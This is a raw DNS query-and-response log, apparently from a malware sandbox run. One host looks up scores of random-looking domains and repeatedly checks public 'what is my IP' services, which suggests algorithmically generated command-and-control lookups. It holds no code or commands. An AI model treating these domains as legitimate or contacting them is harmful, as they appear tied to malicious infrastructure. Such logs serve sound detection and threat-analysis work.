                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.586915016 CEST192.168.11.301.1.1.10x9085Standard query (0)bnuclyrxygnf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:50.721501112 CEST192.168.11.301.1.1.10x6613Standard query (0)coxovsu.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.712886095 CEST192.168.11.301.1.1.10x33f2Standard query (0)ryxqnubutjv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.847227097 CEST192.168.11.301.1.1.10x78a1Standard query (0)zyzubzht.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:51.982026100 CEST192.168.11.301.1.1.10x9c0Standard query (0)qqbnhgbsqxd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.148946047 CEST192.168.11.301.1.1.10x16cbStandard query (0)fxzpqzqd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.358076096 CEST192.168.11.301.1.1.10x107dStandard query (0)pzavkbwk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.399060965 CEST192.168.11.301.1.1.10x8680Standard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.526359081 CEST192.168.11.301.1.1.10xc3beStandard query (0)tlbiku.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.659454107 CEST192.168.11.301.1.1.10x532cStandard query (0)vupjfqd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.795188904 CEST192.168.11.301.1.1.10xb8fdStandard query (0)cmixxszxrf.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:52.930325031 CEST192.168.11.301.1.1.10x8d0aStandard query (0)hintqdku.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.098484039 CEST192.168.11.301.1.1.10xe005Standard query (0)bwvdpivgkbq.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.390530109 CEST192.168.11.301.1.1.10x5262Standard query (0)ybwgqhqrij.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.524136066 CEST192.168.11.301.1.1.10x30fcStandard query (0)teewxe.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:53.750977039 CEST192.168.11.301.1.1.10x557fStandard query (0)aubohelcvlm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.044800997 CEST192.168.11.301.1.1.10x255dStandard query (0)rnrbzaiv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.281815052 CEST192.168.11.301.1.1.10x5c08Standard query (0)uwpdwvsp.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.589972973 CEST192.168.11.301.1.1.10xc1d0Standard query (0)trmpbuwu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.722759008 CEST192.168.11.301.1.1.10x2532Standard query (0)mkouldrk.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.835540056 CEST192.168.11.301.1.1.10xe4dfStandard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:54.857971907 CEST192.168.11.301.1.1.10x5b63Standard query (0)dadqeqrbmhkp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.025285959 CEST192.168.11.301.1.1.10x5426Standard query (0)pguuxfdjxm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.235795975 CEST192.168.11.301.1.1.10x857bStandard query (0)voisfho.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.537533998 CEST192.168.11.301.1.1.10x73cfStandard query (0)aamsoqwekwec.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.721199036 CEST192.168.11.301.1.1.10xdce8Standard query (0)jcasyzwnyb.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.856214046 CEST192.168.11.301.1.1.10x1e3dStandard query (0)kzzieqwxrfgm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:55.990683079 CEST192.168.11.301.1.1.10x840fStandard query (0)hoacxkhcaot.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.125519037 CEST192.168.11.301.1.1.10xa7f6Standard query (0)bqyuiihdvkwp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.291580915 CEST192.168.11.301.1.1.10x47d8Standard query (0)ykvsdehnbic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.457935095 CEST192.168.11.301.1.1.10x36ccStandard query (0)mdabnbhqftj.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.691026926 CEST192.168.11.301.1.1.10xdb5Standard query (0)gqiugkyksc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:56.825618982 CEST192.168.11.301.1.1.10x3be3Standard query (0)bgkwjol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.011589050 CEST192.168.11.301.1.1.10x6346Standard query (0)ucrxnssd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.176898003 CEST192.168.11.301.1.1.10x9795Standard query (0)faasdt.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.388931036 CEST192.168.11.301.1.1.10x2130Standard query (0)ozsqpqy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.525916100 CEST192.168.11.301.1.1.10x2897Standard query (0)niyutxia.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.660623074 CEST192.168.11.301.1.1.10x5d61Standard query (0)tqpofcjab.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:57.828598022 CEST192.168.11.301.1.1.10x7ab5Standard query (0)terdonh.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.039510012 CEST192.168.11.301.1.1.10x2494Standard query (0)vsmntqmv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.356168032 CEST192.168.11.301.1.1.10x1197Standard query (0)vjjuxotcr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.492325068 CEST192.168.11.301.1.1.10x1e37Standard query (0)pycyjn.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.707912922 CEST192.168.11.301.1.1.10x2a9bStandard query (0)zryswp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:58.875504971 CEST192.168.11.301.1.1.10xc159Standard query (0)iffkftv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.009589911 CEST192.168.11.301.1.1.10x3d85Standard query (0)puvxcbhx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.146507978 CEST192.168.11.301.1.1.10x54abStandard query (0)vwuhtwjkiukd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.287482023 CEST192.168.11.301.1.1.10xb150Standard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.380774975 CEST192.168.11.301.1.1.10x6db8Standard query (0)rqlmrcbc.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.515264988 CEST192.168.11.301.1.1.10x8393Standard query (0)ayocmawe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.650487900 CEST192.168.11.301.1.1.10x576eStandard query (0)akyndev.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:59.951936007 CEST192.168.11.301.1.1.10x1dfStandard query (0)jnqmtia.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.084130049 CEST192.168.11.301.1.1.10x4703Standard query (0)pqjmoi.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.250597000 CEST192.168.11.301.1.1.10x88ecStandard query (0)hcgosj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.418502092 CEST192.168.11.301.1.1.10xdc7fStandard query (0)ocowiwigou.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.443864107 CEST192.168.11.301.1.1.10x757cStandard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.552272081 CEST192.168.11.301.1.1.10x985Standard query (0)yjtugxbx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.689439058 CEST192.168.11.301.1.1.10xc5ceStandard query (0)gbekjlws.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.823631048 CEST192.168.11.301.1.1.10xa72eStandard query (0)nkrqzg.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:00.957568884 CEST192.168.11.301.1.1.10x98beStandard query (0)uzpknqpehid.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.154458046 CEST192.168.11.301.1.1.10x4098Standard query (0)sgdyfbvwe.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.291104078 CEST192.168.11.301.1.1.10x83a1Standard query (0)iaimiwaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.456621885 CEST192.168.11.301.1.1.10xc1b6Standard query (0)rcxvkunydmr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.593631029 CEST192.168.11.301.1.1.10xd318Standard query (0)meyuyaewaogs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:01.891725063 CEST192.168.11.301.1.1.10x1971Standard query (0)ksmggayg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:02.027658939 CEST192.168.11.301.1.1.10x40faStandard query (0)xkesrsk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:04.912002087 CEST192.168.11.301.1.1.10xdd5aStandard query (0)whatismyip.everdot.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.270987988 CEST192.168.11.301.1.1.10xe4eeStandard query (0)htdnxe.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.437107086 CEST192.168.11.301.1.1.10xa62eStandard query (0)djlijkrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.610394001 CEST192.168.11.301.1.1.10x3b1eStandard query (0)hfmmrpaa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.744123936 CEST192.168.11.301.1.1.10xfa30Standard query (0)rqrglipkoyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:05.910861015 CEST192.168.11.301.1.1.10x483Standard query (0)eobhpynq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.051698923 CEST192.168.11.301.1.1.10xf13cStandard query (0)www.whatismyip.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.077606916 CEST192.168.11.301.1.1.10xab85Standard query (0)tchyfuocxrc.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.279476881 CEST192.168.11.301.1.1.10x9c33Standard query (0)gshaoi.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.508794069 CEST192.168.11.301.1.1.10xb2c4Standard query (0)giglhwhuby.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.677675009 CEST192.168.11.301.1.1.10x40feStandard query (0)hamsvogno.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.812747002 CEST192.168.11.301.1.1.10x52c9Standard query (0)ntcgvuryjee.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:06.948067904 CEST192.168.11.301.1.1.10x45e3Standard query (0)qkwcuasm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.083620071 CEST192.168.11.301.1.1.10x31b2Standard query (0)dsklbkmbbx.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.292474031 CEST192.168.11.301.1.1.10xcc2cStandard query (0)qmwoewqkaamo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.457473993 CEST192.168.11.301.1.1.10xe360Standard query (0)musmgsaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.597765923 CEST192.168.11.301.1.1.10x86a7Standard query (0)jcfzmn.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.804894924 CEST192.168.11.301.1.1.10x5f5Standard query (0)suzetmnq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:07.971553087 CEST192.168.11.301.1.1.10x3650Standard query (0)nllqlqfxanom.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.104996920 CEST192.168.11.301.1.1.10x661bStandard query (0)jubkwv.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.411901951 CEST192.168.11.301.1.1.10xbb92Standard query (0)saxwjjjeb.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.545228958 CEST192.168.11.301.1.1.10x3f88Standard query (0)keyuqaco.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.787936926 CEST192.168.11.301.1.1.10x11edStandard query (0)hzxvah.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:08.954477072 CEST192.168.11.301.1.1.10xe9d7Standard query (0)qaciphd.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.121844053 CEST192.168.11.301.1.1.10xbd4eStandard query (0)vgpckslqq.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.422920942 CEST192.168.11.301.1.1.10xe271Standard query (0)qqikyaggkswy.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:09.602078915 CEST192.168.11.301.1.1.10xac18Standard query (0)kwecii.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:12.905014038 CEST192.168.11.301.1.1.10x754bStandard query (0)smtcrrm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.039949894 CEST192.168.11.301.1.1.10xb785Standard query (0)rfqpbojltq.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.226073980 CEST192.168.11.301.1.1.10x4ab0Standard query (0)waieucykau.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.360898972 CEST192.168.11.301.1.1.10x8189Standard query (0)dieqnoxgfoxb.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.497730017 CEST192.168.11.301.1.1.10x45a8Standard query (0)pqkcuqqnpqd.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.632421970 CEST192.168.11.301.1.1.10xe093Standard query (0)hiazdcy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.818116903 CEST192.168.11.301.1.1.10x762aStandard query (0)kqpxtsgpzx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:13.951265097 CEST192.168.11.301.1.1.10x640aStandard query (0)vjvslqxmv.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.086193085 CEST192.168.11.301.1.1.10xe265Standard query (0)otykmmxuwhs.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.303845882 CEST192.168.11.301.1.1.10xffbStandard query (0)savdog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.471139908 CEST192.168.11.301.1.1.10x1c72Standard query (0)jgrfdugjau.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.639642954 CEST192.168.11.301.1.1.10x1870Standard query (0)kkakqqayhyu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.785166025 CEST192.168.11.301.1.1.10xb3ffStandard query (0)eedijewjab.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:14.970844984 CEST192.168.11.301.1.1.10xbb55Standard query (0)hayarmmbzyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.136620045 CEST192.168.11.301.1.1.10x90b7Standard query (0)cspcpap.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.271349907 CEST192.168.11.301.1.1.10xc76aStandard query (0)phwbulosja.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.406755924 CEST192.168.11.301.1.1.10xbb30Standard query (0)iaqmeowe.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.540358067 CEST192.168.11.301.1.1.10x3897Standard query (0)bcnuzzk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.677042961 CEST192.168.11.301.1.1.10x58cbStandard query (0)nhzkbxtuxso.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.811647892 CEST192.168.11.301.1.1.10x6b93Standard query (0)awbabah.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:15.944691896 CEST192.168.11.301.1.1.10x8d12Standard query (0)qiaykqoaqe.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.178014040 CEST192.168.11.301.1.1.10x9afStandard query (0)rigtmebyrwk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.416313887 CEST192.168.11.301.1.1.10xf72cStandard query (0)fyuftjcbykxh.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.551795959 CEST192.168.11.301.1.1.10xaae4Standard query (0)bwvwvtkesnht.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.719321012 CEST192.168.11.301.1.1.10x4c8dStandard query (0)ikvzsyc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:16.906594038 CEST192.168.11.301.1.1.10xc624Standard query (0)hztehanu.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.073424101 CEST192.168.11.301.1.1.10xf4e7Standard query (0)qsiwcddk.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.206625938 CEST192.168.11.301.1.1.10xf58cStandard query (0)drpgrw.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.373308897 CEST192.168.11.301.1.1.10xc1c3Standard query (0)ocndbcf.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.609843969 CEST192.168.11.301.1.1.10x61b0Standard query (0)pzhnljvmfru.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.776593924 CEST192.168.11.301.1.1.10xeb91Standard query (0)nqhldiaq.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:17.911267996 CEST192.168.11.301.1.1.10x737dStandard query (0)ejguppjem.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.045850039 CEST192.168.11.301.1.1.10x25acStandard query (0)ufvxhp.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.178642988 CEST192.168.11.301.1.1.10x1fbStandard query (0)xilsfdgn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:18.313116074 CEST192.168.11.301.1.1.10xc45fStandard query (0)qkqsgqekyago.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.487586021 CEST192.168.11.301.1.1.10xf771Standard query (0)jtbancuulki.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.653847933 CEST192.168.11.301.1.1.10x967aStandard query (0)ykydrbpoxqpu.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:21.957401991 CEST192.168.11.301.1.1.10xc967Standard query (0)gorfnmtwasl.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.125103951 CEST192.168.11.301.1.1.10xff19Standard query (0)xnsamtpm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.292558908 CEST192.168.11.301.1.1.10x5ef2Standard query (0)pfqdbsyn.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.426474094 CEST192.168.11.301.1.1.10x2ebeStandard query (0)euuoqg.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.660937071 CEST192.168.11.301.1.1.10xa16eStandard query (0)vtbcnjvmwj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.833848953 CEST192.168.11.301.1.1.10x74a3Standard query (0)xfbeqk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:22.970261097 CEST192.168.11.301.1.1.10xdaacStandard query (0)pgglnkael.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:23.105150938 CEST192.168.11.301.1.1.10xb9f7Standard query (0)buakrgp.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.341943026 CEST192.168.11.301.1.1.10xe144Standard query (0)xthmhc.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.552638054 CEST192.168.11.301.1.1.10x8776Standard query (0)ebzwtwgch.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.763279915 CEST192.168.11.301.1.1.10xc2eStandard query (0)vispyytg.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:26.961076975 CEST192.168.11.301.1.1.10x2cf8Standard query (0)nifigom.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.130109072 CEST192.168.11.301.1.1.10xc16aStandard query (0)nrayothh.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.264703035 CEST192.168.11.301.1.1.10x44acStandard query (0)zncepwjkjm.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.400918007 CEST192.168.11.301.1.1.10xab79Standard query (0)rieoxvzxc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:41:27.583868027 CEST192.168.11.301.1.1.10x136aStandard query (0)ystygahkl.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:39.970716953 CEST1.1.1.1192.168.11.300xfad0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:39.970716953 CEST1.1.1.1192.168.11.300xfad0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:40.543474913 CEST1.1.1.1192.168.11.300x785eNo error (0)c.pki.googpki-goog.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:40.543474913 CEST1.1.1.1192.168.11.300x785eNo error (0)pki-goog.l.google.com142.250.217.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:38:58.691678047 CEST1.1.1.1192.168.11.300x46a9Name error (3)www.whatismyip.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:00.056958914 CEST1.1.1.1192.168.11.300x9751Name error (3)whatismyip.everdot.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.240602970 CEST1.1.1.1192.168.11.300x6ae7No error (0)whatismyipaddress.com104.19.223.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:04.240602970 CEST1.1.1.1192.168.11.300x6ae7No error (0)whatismyipaddress.com104.19.222.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:05.665496111 CEST1.1.1.1192.168.11.300xa060No error (0)www.showmyipaddress.com172.67.155.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:05.665496111 CEST1.1.1.1192.168.11.300xa060No error (0)www.showmyipaddress.com104.21.74.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:07.100681067 CEST1.1.1.1192.168.11.300xa7deName error (3)whatismyip.everdot.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:08.242410898 CEST1.1.1.1192.168.11.300xa248Name error (3)www.whatismyip.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:12.021565914 CEST1.1.1.1192.168.11.300xd4fcNo error (0)www.whatismyip.com104.27.206.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:12.021565914 CEST1.1.1.1192.168.11.300xd4fcNo error (0)www.whatismyip.com104.27.207.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:13.458456993 CEST1.1.1.1192.168.11.300x9d4dName error (3)www.whatismyip.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:15.612498045 CEST1.1.1.1192.168.11.300x2a8cName error (3)whatismyip.everdot.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:20.065711021 CEST1.1.1.1192.168.11.300x2f1dName error (3)www.whatismyip.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:23.849709034 CEST1.1.1.1192.168.11.300x5280No error (0)www.myspace.commyspace.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:23.849709034 CEST1.1.1.1192.168.11.300x5280No error (0)myspace.com34.111.176.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.261054993 CEST1.1.1.1192.168.11.300x56f5No error (0)lwbjtptjlzji.net35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.451708078 CEST1.1.1.1192.168.11.300x742eNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:24.451708078 CEST1.1.1.1192.168.11.300x742eNo error (0)star-mini.c10r.facebook.com31.13.67.35A (IP address)IN (0x0001)false
